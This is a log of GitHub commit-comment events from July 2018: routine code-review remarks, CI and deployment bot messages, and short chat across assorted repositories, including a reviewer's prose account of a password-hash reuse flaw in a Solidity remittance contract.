{"id":"7950170345","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29671313,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T13:43:20Z","updated_at":"2018-07-11T13:43:20Z","author_association":"NONE","body":"А, если ты воспользуешься советами к trains_count_by_type, то это будет работать так\r\n``` @station.trains_count_by_type(:passenger) ```"}},"created_at":"2018-07-11T13:43:20Z"}
{"id":"7950173690","type":"CommitCommentEvent","actor":{"login":"boris-fabernovel"},"repo":{"name":"dagatsoin/git-workshop"},"payload":{"comment":{"id":29671319,"position":66,"line":99,"path":"playground/src/main/scala/playground/view/TodoList.scala","commit_id":"fe3ccce19d0a051514839187cba3f3d4598df6c4","created_at":"2018-07-11T13:43:50Z","updated_at":"2018-07-11T13:43:50Z","author_association":"COLLABORATOR","body":"ça c'est pas bien"}},"created_at":"2018-07-11T13:43:50Z"}
{"id":"7950176055","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671325,"position":null,"line":null,"path":null,"commit_id":"d705b6989996a897bce54cdcf831239d9e7a88c8","created_at":"2018-07-11T13:44:12Z","updated_at":"2018-07-11T13:44:12Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-268](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-268).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-268-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T13:44:12Z"}
{"id":"7950178983","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29671338,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-11T13:44:38Z","updated_at":"2018-07-11T13:44:38Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2931 of 2932 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T13:44:38Z"}
{"id":"7950179167","type":"CommitCommentEvent","actor":{"login":"Danielle9897"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29671339,"position":54,"line":246,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"5f037424357b51a4a53aa36f30508e590766b918","created_at":"2018-07-11T13:44:40Z","updated_at":"2018-07-11T13:44:40Z","author_association":"COLLABORATOR","body":"* About null:\r\nI added validation so that the analyzer field must be set, \r\nso the analyzer field is set automatically **only** when user sets [FTS: yes] && [Indexing: Search]\r\nOtherwize the user has to either select from dropdown or enter a custom analyzer.\r\n\r\n* About fully qualified name: \r\nI think we shouldn't specifically support that, selcting from dropdown w/ autocomplete is easy :) \r\nHowever...... Side effect of entering a custom analyzer is that user can enter the 'fully qualified name',\r\nIt will be passed **as is** to the server and will have the same effect....."}},"created_at":"2018-07-11T13:44:40Z"}
{"id":"7950182783","type":"CommitCommentEvent","actor":{"login":"qq420273254"},"repo":{"name":"qq420273254/VVV"},"payload":{"comment":{"id":29671354,"position":null,"line":null,"path":null,"commit_id":"9f27cc19423b9585546daea4c5f7c0c649f01da8","created_at":"2018-07-11T13:45:13Z","updated_at":"2018-07-11T13:45:13Z","author_association":"OWNER","body":"import urllib\r\nimport urllib2\r\n \r\n#values = {\"username\":\"420com\",\"password\":\"2\"}\r\n#data = urllib.urlencode(values) \r\nurl = \"https://youpin.mi.com/\"\r\nuser_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\r\n#headers = {'User-Agent' : user_agent}\r\nrequest = urllib2.Req"}},"created_at":"2018-07-11T13:45:13Z"}
{"id":"7950183875","type":"CommitCommentEvent","actor":{"login":"gokberkkaraca"},"repo":{"name":"gokberkkaraca/zlint"},"payload":{"comment":{"id":29671369,"position":null,"line":null,"path":null,"commit_id":"06ff1ee9d834824894208cac1c04ebd396dde961","created_at":"2018-07-11T13:45:21Z","updated_at":"2018-07-11T13:45:21Z","author_association":"OWNER","body":"Thanks, I didn't know that it imports from local repository. Let me check my Slack account!"}},"created_at":"2018-07-11T13:45:21Z"}
{"id":"7950186500","type":"CommitCommentEvent","actor":{"login":"boris-fabernovel"},"repo":{"name":"dagatsoin/git-workshop"},"payload":{"comment":{"id":29671381,"position":5,"line":5,"path":"playground/src/main/scala/playground/model/Todo.scala","commit_id":"fe3ccce19d0a051514839187cba3f3d4598df6c4","created_at":"2018-07-11T13:45:47Z","updated_at":"2018-07-11T13:45:47Z","author_association":"COLLABORATOR","body":"replace isDone by isFinished"}},"created_at":"2018-07-11T13:45:47Z"}
{"id":"7950188647","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29671388,"position":null,"line":null,"path":null,"commit_id":"d3be79682fc43fd07cafeb44228335a8e84aba6b","created_at":"2018-07-11T13:46:08Z","updated_at":"2018-07-11T13:46:08Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-45](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-11T13:46:08Z"}
{"id":"7950188659","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29671389,"position":null,"line":null,"path":null,"commit_id":"207158531e97fac46cfaa6a46c66601e4b30fbf9","created_at":"2018-07-11T13:46:08Z","updated_at":"2018-07-11T13:46:08Z","author_association":"COLLABORATOR","body":"Ah yes, \\tau_W is an example of a local definition. Just noting here that @smiths' comment in https://github.com/smiths/swhs/issues/35#issuecomment-403554554 mentions why in more detail."}},"created_at":"2018-07-11T13:46:08Z"}
{"id":"7950190937","type":"CommitCommentEvent","actor":{"login":"ianlancetaylor"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29671404,"position":null,"line":null,"path":null,"commit_id":"e243d242d750f19cd1c3aefa7da1ad238f21502e","created_at":"2018-07-11T13:46:29Z","updated_at":"2018-07-11T13:46:29Z","author_association":"CONTRIBUTOR","body":"Thanks.  We don't use GitHub for code review, so almost nobody sees these comments on GitHub.  It would be better directed to https://golang.org/cl/16309.  Thanks.  In this case I'll just make the change."}},"created_at":"2018-07-11T13:46:29Z"}
{"id":"7950192913","type":"CommitCommentEvent","actor":{"login":"yashasvibajpai"},"repo":{"name":"arpitmishra1/first-_git_repository"},"payload":{"comment":{"id":29671406,"position":null,"line":null,"path":null,"commit_id":"40e81799e56cfc9f7ca7b7dd34069de5a7dff932","created_at":"2018-07-11T13:46:50Z","updated_at":"2018-07-11T13:46:50Z","author_association":"NONE","body":"Wow **Gazab** **_Awesome_**"}},"created_at":"2018-07-11T13:46:50Z"}
{"id":"7950196270","type":"CommitCommentEvent","actor":{"login":"AndroiableDroid"},"repo":{"name":"LLuviaOS/platform_manifest"},"payload":{"comment":{"id":29671416,"position":null,"line":null,"path":null,"commit_id":"15655b18003222d4016b5cc7eb4453d84e8adeaa","created_at":"2018-07-11T13:47:22Z","updated_at":"2018-07-11T13:47:22Z","author_association":"COLLABORATOR","body":"oh that was silly :+1: "}},"created_at":"2018-07-11T13:47:22Z"}
{"id":"7950201283","type":"CommitCommentEvent","actor":{"login":"ophian"},"repo":{"name":"ophian/styx"},"payload":{"comment":{"id":29671427,"position":null,"line":null,"path":null,"commit_id":"d49e25b120e6f0b434341d4a6bd147b019c2de06","created_at":"2018-07-11T13:48:11Z","updated_at":"2018-07-11T13:48:11Z","author_association":"OWNER","body":"read; genpage: Global assign Smarty Block ARCHIVES in genpage "}},"created_at":"2018-07-11T13:48:11Z"}
{"id":"7950205293","type":"CommitCommentEvent","actor":{"login":"ianlancetaylor"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29671436,"position":null,"line":null,"path":null,"commit_id":"e243d242d750f19cd1c3aefa7da1ad238f21502e","created_at":"2018-07-11T13:48:48Z","updated_at":"2018-07-11T13:48:48Z","author_association":"CONTRIBUTOR","body":"Actually, I won't make the change.  I think it's correct as is.  The comment is describing both Name and PackagePath."}},"created_at":"2018-07-11T13:48:48Z"}
{"id":"7950208730","type":"CommitCommentEvent","actor":{"login":"muwongeemmanuel"},"repo":{"name":"muwongeemmanuel/recessgroup10"},"payload":{"comment":{"id":29671443,"position":null,"line":null,"path":null,"commit_id":"5b6dcd858d22c0124c8cd8cf1b72b2cc4356d8e3","created_at":"2018-07-11T13:49:21Z","updated_at":"2018-07-11T13:49:21Z","author_association":"OWNER","body":"hi guys ,this is odds part. its complete but not yet perfect, so you can check through it. thanks"}},"created_at":"2018-07-11T13:49:21Z"}
{"id":"7950209905","type":"CommitCommentEvent","actor":{"login":"bitraid"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29671448,"position":6,"line":45,"path":"misc/qutebrowser.nsi","commit_id":"0b9855598742e09853efff798a4f61cbc86fded5","created_at":"2018-07-11T13:49:32Z","updated_at":"2018-07-11T13:49:32Z","author_association":"CONTRIBUTOR","body":"With the `ExecWait` command the directory won't be removed because the uninstaller can't delete itself using the `_?` argument (normaly it would copy itself to `temp` and run from there but the `ExecWait` would fail)."}},"created_at":"2018-07-11T13:49:32Z"}
{"id":"7950211362","type":"CommitCommentEvent","actor":{"login":"jdelia"},"repo":{"name":"wprig/wprig"},"payload":{"comment":{"id":29671452,"position":null,"line":null,"path":null,"commit_id":"4275c51a98db67378804a4ea74dabbaada8ca61f","created_at":"2018-07-11T13:49:47Z","updated_at":"2018-07-11T13:49:47Z","author_association":"NONE","body":"+1 for these changes! "}},"created_at":"2018-07-11T13:49:47Z"}
{"id":"7950220327","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671463,"position":null,"line":null,"path":null,"commit_id":"b6a57a6c1a160c9906e0ef417c2dbee1f3fe98aa","created_at":"2018-07-11T13:51:13Z","updated_at":"2018-07-11T13:51:13Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-271](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-271).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-271-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T13:51:13Z"}
{"id":"7950224249","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29671477,"position":null,"line":null,"path":null,"commit_id":"b677f97575faa24a399d7a87bdb9b8f1dfaa08c4","created_at":"2018-07-11T13:51:47Z","updated_at":"2018-07-11T13:51:47Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-116](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-116).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-116-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-11T13:51:47Z"}
{"id":"7950225846","type":"CommitCommentEvent","actor":{"login":"palmfighter"},"repo":{"name":"palmfighter/test"},"payload":{"comment":{"id":29671479,"position":null,"line":null,"path":null,"commit_id":"fbb5c382032fd168550066e0fc47811c3099499f","created_at":"2018-07-11T13:52:03Z","updated_at":"2018-07-11T13:52:03Z","author_association":"OWNER","body":"[WP-Next-Gen_CASB.pdf](https://github.com/palmfighter/test/files/2184730/WP-Next-Gen_CASB.pdf)\r\n"}},"created_at":"2018-07-11T13:52:03Z"}
{"id":"7950228579","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29671485,"position":null,"line":null,"path":null,"commit_id":"6cca9dac98284e527b5af3f11eb31b221accf666","created_at":"2018-07-11T13:52:28Z","updated_at":"2018-07-11T13:52:28Z","author_association":"COLLABORATOR","body":"<h3>new notifications icon added</h3>\n\nPreview: <strong><a href='https://18274-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18274-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18274-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T13:52:28Z"}
{"id":"7950237916","type":"CommitCommentEvent","actor":{"login":"baude"},"repo":{"name":"projectatomic/buildah"},"payload":{"comment":{"id":29671492,"position":null,"line":null,"path":null,"commit_id":"a4c56c2fc350de3ae5cf430d29ce3ad907edf7ce","created_at":"2018-07-11T13:53:56Z","updated_at":"2018-07-11T13:53:56Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [buildah cross compilation for darwin](https://trello.com/c/yJD9J47i/614-buildah-cross-compilation-for-darwin)"}},"created_at":"2018-07-11T13:53:56Z"}
{"id":"7950243864","type":"CommitCommentEvent","actor":{"login":"siddharthsheth"},"repo":{"name":"siddharthsheth/DijkstrasAlgorithm"},"payload":{"comment":{"id":29671500,"position":3,"line":2,"path":"README.md","commit_id":"caa6b5afd64a764de2b11a2c55a9aa6b05abe73b","created_at":"2018-07-11T13:54:52Z","updated_at":"2018-07-11T13:54:52Z","author_association":"OWNER","body":"Problem Description\r\n\r\nTask. Given an directed graph with positive edge weights and with n vertices and m edges as well as two vertices u and v, compute the weight of a shortest path between u and v (that is, the minimum total weight of a path from u to v).\r\n\r\nInput Format. A graph is given in the standard format. The next line contains two vertices u and v.\r\n\r\nConstraints. 1 ≤ n ≤ 10^3, 0 ≤ m ≤ 10^5, u != v, 1 ≤ u, v ≤ n, edge weights are non-negative integers not\r\nexceeding 10^3.\r\n\r\nOutput Format. Output the minimum weight of a path from u to v, or −1 if there is no path.\r\n\r\nTime Limits. C: 2 sec, C++: 2 sec, Java: 3 sec, Python: 10 sec. C#: 3 sec, Haskell: 4 sec, JavaScript: 10 sec, Ruby: 10 sec, Scala: 6 sec.\r\n\r\nMemory Limit. 512Mb."}},"created_at":"2018-07-11T13:54:52Z"}
{"id":"7950259912","type":"CommitCommentEvent","actor":{"login":"baude"},"repo":{"name":"projectatomic/libpod"},"payload":{"comment":{"id":29671530,"position":null,"line":null,"path":null,"commit_id":"cc6f0e85f994cab66fb63c4dd8b77b4332151748","created_at":"2018-07-11T13:57:20Z","updated_at":"2018-07-11T13:57:20Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [libpod cross compilation for darwin](https://trello.com/c/tN22vO9q/615-libpod-cross-compilation-for-darwin)"}},"created_at":"2018-07-11T13:57:20Z"}
{"id":"7950272653","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"ludx/ludx.github.io"},"payload":{"comment":{"id":29671543,"position":null,"line":null,"path":null,"commit_id":"80692d5a315b20fe1bbee59ad58c7073c067deaa","created_at":"2018-07-11T13:59:12Z","updated_at":"2018-07-11T13:59:12Z","author_association":"NONE","body":"不错不错，网站终于又要捡起来了啊 😁 "}},"created_at":"2018-07-11T13:59:12Z"}
{"id":"7950273630","type":"CommitCommentEvent","actor":{"login":"SnowIsTargaryen"},"repo":{"name":"SnowIsTargaryen/javaswagger"},"payload":{"comment":{"id":29671546,"position":null,"line":null,"path":null,"commit_id":"d49e3f1abea7ffacf71f40018d29127593841a2b","created_at":"2018-07-11T13:59:21Z","updated_at":"2018-07-11T13:59:21Z","author_association":"OWNER","body":"테스트한다 되돌리기 "}},"created_at":"2018-07-11T13:59:21Z"}
{"id":"7950274514","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671549,"position":28,"line":23,"path":"src/Algorithms/DropLeft.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T13:59:29Z","updated_at":"2018-07-11T13:59:29Z","author_association":"CONTRIBUTOR","body":"It misses the EOF."}},"created_at":"2018-07-11T13:59:29Z"}
{"id":"7950276135","type":"CommitCommentEvent","actor":{"login":"Tauriella"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29671551,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T13:59:42Z","updated_at":"2018-07-11T13:59:42Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-11T13:59:42Z"}
{"id":"7950282240","type":"CommitCommentEvent","actor":{"login":"KLHlinux"},"repo":{"name":"KLHlinux/test01"},"payload":{"comment":{"id":29671575,"position":null,"line":null,"path":null,"commit_id":"13588c50179190d7653fe60e8088d02e0f1e6a3a","created_at":"2018-07-11T14:00:36Z","updated_at":"2018-07-11T14:00:36Z","author_association":"OWNER","body":"hhhh"}},"created_at":"2018-07-11T14:00:36Z"}
{"id":"7950282259","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671574,"position":8,"line":19,"path":"src/Algorithms/DropLeft.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:00:36Z","updated_at":"2018-07-11T14:00:36Z","author_association":"CONTRIBUTOR","body":"The coding style is not the valid PSR-2.\r\nIt should be:\r\n\r\n```php\r\nif ($index > $number - 1) {\r\n    $acc[$index] = $value;\r\n}\r\n```"}},"created_at":"2018-07-11T14:00:36Z"}
{"id":"7950284067","type":"CommitCommentEvent","actor":{"login":"ace411"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671579,"position":28,"line":23,"path":"src/Algorithms/DropLeft.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:00:51Z","updated_at":"2018-07-11T14:00:51Z","author_association":"OWNER","body":"You mean the new line at the End Of File?"}},"created_at":"2018-07-11T14:00:51Z"}
{"id":"7950286104","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671588,"position":null,"line":null,"path":null,"commit_id":"0f63853c4e00043f72f01b3593423ab061b93a8b","created_at":"2018-07-11T14:01:10Z","updated_at":"2018-07-11T14:01:10Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-272](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-272).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-272-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T14:01:10Z"}
{"id":"7950287629","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671591,"position":8,"line":19,"path":"src/Algorithms/DropRight.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:01:23Z","updated_at":"2018-07-11T14:01:23Z","author_association":"CONTRIBUTOR","body":"It's the same issue in the previous comment I mention."}},"created_at":"2018-07-11T14:01:23Z"}
{"id":"7950287749","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29671592,"position":null,"line":null,"path":null,"commit_id":"deb84689847055891fcdec16bbe69ba5ac52d7e0","created_at":"2018-07-11T14:01:24Z","updated_at":"2018-07-11T14:01:24Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-45](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-11T14:01:24Z"}
{"id":"7950287958","type":"CommitCommentEvent","actor":{"login":"NonyLand"},"repo":{"name":"NonyLand/OddLaught"},"payload":{"comment":{"id":29671594,"position":null,"line":null,"path":null,"commit_id":"3265e4ccb17d25277a335deaf2500188265aa34d","created_at":"2018-07-11T14:01:26Z","updated_at":"2018-07-11T14:01:26Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-11T14:01:26Z"}
{"id":"7950289230","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671596,"position":28,"line":23,"path":"src/Algorithms/DropRight.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:01:39Z","updated_at":"2018-07-11T14:01:39Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:01:39Z"}
{"id":"7950291206","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671600,"position":22,"line":23,"path":"src/Algorithms/Fill.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:01:57Z","updated_at":"2018-07-11T14:01:57Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:01:57Z"}
{"id":"7950292804","type":"CommitCommentEvent","actor":{"login":"KushTej"},"repo":{"name":"KushTej/Java-Programs"},"payload":{"comment":{"id":29671608,"position":7,"line":17,"path":"add.java","commit_id":"fe8a839ea71c551e81aab639179e6d349bd0f7d3","created_at":"2018-07-11T14:02:13Z","updated_at":"2018-07-11T14:02:13Z","author_association":"OWNER","body":"add mod operation too!!\r\n"}},"created_at":"2018-07-11T14:02:13Z"}
{"id":"7950294309","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671611,"position":20,"line":21,"path":"src/Algorithms/Filter.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:02:26Z","updated_at":"2018-07-11T14:02:26Z","author_association":"CONTRIBUTOR","body":"It is the same issue I mention in the previous comment."}},"created_at":"2018-07-11T14:02:26Z"}
{"id":"7950295093","type":"CommitCommentEvent","actor":{"login":"scottkurz"},"repo":{"name":"WASdev/sample.batch.sleepybatchlet"},"payload":{"comment":{"id":29671613,"position":null,"line":null,"path":null,"commit_id":"ce6e4a92dd4c1c091cc7fa5a40370a7eb75cea00","created_at":"2018-07-11T14:02:33Z","updated_at":"2018-07-11T14:02:33Z","author_association":"MEMBER","body":"Fixes #3 "}},"created_at":"2018-07-11T14:02:33Z"}
{"id":"7950295371","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671614,"position":32,"line":25,"path":"src/Algorithms/Filter.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:02:35Z","updated_at":"2018-07-11T14:02:35Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:02:35Z"}
{"id":"7950296073","type":"CommitCommentEvent","actor":{"login":"lx1314"},"repo":{"name":"lx1314/simple"},"payload":{"comment":{"id":29671615,"position":null,"line":null,"path":null,"commit_id":"ddbe42b42e987d0a7fcb72b45c12798a931d07ff","created_at":"2018-07-11T14:02:42Z","updated_at":"2018-07-11T14:02:42Z","author_association":"OWNER","body":"这是一个简单的工程"}},"created_at":"2018-07-11T14:02:42Z"}
{"id":"7950296459","type":"CommitCommentEvent","actor":{"login":"GaurangTandon"},"repo":{"name":"soscripted/sox"},"payload":{"comment":{"id":29671617,"position":5,"line":4,"path":"sox.user.js","commit_id":"22492af8a9fc26745eeee55b619c245d14d6f0d6","created_at":"2018-07-11T14:02:45Z","updated_at":"2018-07-11T14:02:45Z","author_association":"NONE","body":"should rather really make this 2.3.0 ;)"}},"created_at":"2018-07-11T14:02:45Z"}
{"id":"7950298544","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671620,"position":30,"line":27,"path":"src/Algorithms/IndexOf.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:03:04Z","updated_at":"2018-07-11T14:03:04Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:03:04Z"}
{"id":"7950300789","type":"CommitCommentEvent","actor":{"login":"ISPHOST"},"repo":{"name":"zenoss/ZenPacks.zenoss.HttpMonitor"},"payload":{"comment":{"id":29671624,"position":59,"line":111,"path":"ZenPacks/zenoss/HttpMonitor/http.py","commit_id":"b9f8750db48b6b10ed5f0f0afc5dde3b8e894d1e","created_at":"2018-07-11T14:03:25Z","updated_at":"2018-07-11T14:03:25Z","author_association":"CONTRIBUTOR","body":"I've updated logic for use cases where:\r\n1) port 80 with SSL True\r\n2) port 443 without SSL"}},"created_at":"2018-07-11T14:03:25Z"}
{"id":"7950301158","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671627,"position":30,"line":25,"path":"src/Algorithms/Map.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:03:28Z","updated_at":"2018-07-11T14:03:28Z","author_association":"CONTRIBUTOR","body":"Missing EOF."}},"created_at":"2018-07-11T14:03:28Z"}
{"id":"7950310703","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671645,"position":27,"line":19,"path":"src/Algorithms/Max.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:04:55Z","updated_at":"2018-07-11T14:04:55Z","author_association":"CONTRIBUTOR","body":"This syntax needs to be organized and I think this code readability is not good."}},"created_at":"2018-07-11T14:04:55Z"}
{"id":"7950314392","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29671649,"position":16,"line":24,"path":"src/Algorithms/Memoize.php","commit_id":"90a88914329e78c2f1496793802ce1fa935c719e","created_at":"2018-07-11T14:05:29Z","updated_at":"2018-07-11T14:05:29Z","author_association":"CONTRIBUTOR","body":"It has the same issue I mention in the previous comment."}},"created_at":"2018-07-11T14:05:29Z"}
{"id":"7950315017","type":"CommitCommentEvent","actor":{"login":"15331335"},"repo":{"name":"longjj/MineCube"},"payload":{"comment":{"id":29671652,"position":null,"line":null,"path":null,"commit_id":"2306dbed1592dba86f6d27ae046e516abd69a815","created_at":"2018-07-11T14:05:35Z","updated_at":"2018-07-11T14:05:35Z","author_association":"COLLABORATOR","body":"🤔️这个不应该用 glViewport 解决吗？（之前的 Retina 分辨率问题就是这么解决的）"}},"created_at":"2018-07-11T14:05:35Z"}
{"id":"7950315959","type":"CommitCommentEvent","actor":{"login":"ISPHOST"},"repo":{"name":"zenoss/ZenPacks.zenoss.HttpMonitor"},"payload":{"comment":{"id":29671655,"position":26,"line":140,"path":"ZenPacks/zenoss/HttpMonitor/datasources/HttpMonitorDataSource.py","commit_id":"b9f8750db48b6b10ed5f0f0afc5dde3b8e894d1e","created_at":"2018-07-11T14:05:43Z","updated_at":"2018-07-11T14:05:43Z","author_association":"CONTRIBUTOR","body":"Created capability with versions 3.0.0 - 3.0.3"}},"created_at":"2018-07-11T14:05:43Z"}
{"id":"7950316698","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29671670,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T14:05:49Z","updated_at":"2018-07-11T14:05:49Z","author_association":"NONE","body":"* I deploy `Remittance` at `address0`\r\n* you deploy `Remittance` at `address1`\r\n* Carol, for her business, decides to accept payments from both contracts\r\n* Alice sends 1 Ether to `address0` for Carol with the Bob password `\"hello\"`\r\n* Bob visits Carol, gives the password, Carol gets the Ether from `address0`, Bob gets the cash\r\n* David sends 10 Ethers to `address1` for Carol with the Eve password `\"hello\"`\r\n\r\nNow it gets interesting:\r\n\r\n* Carol remembers the hash from before and notices that it is the same hash. Yes, 2 different contracts, same hash\r\n* Carol knows it is thus the same password, no need to wait for Eve\r\n* Carol takes the 10 Ethers from `address1` and flies away\r\n\r\nHow do you protect your consumers?"}},"created_at":"2018-07-11T14:05:49Z"}
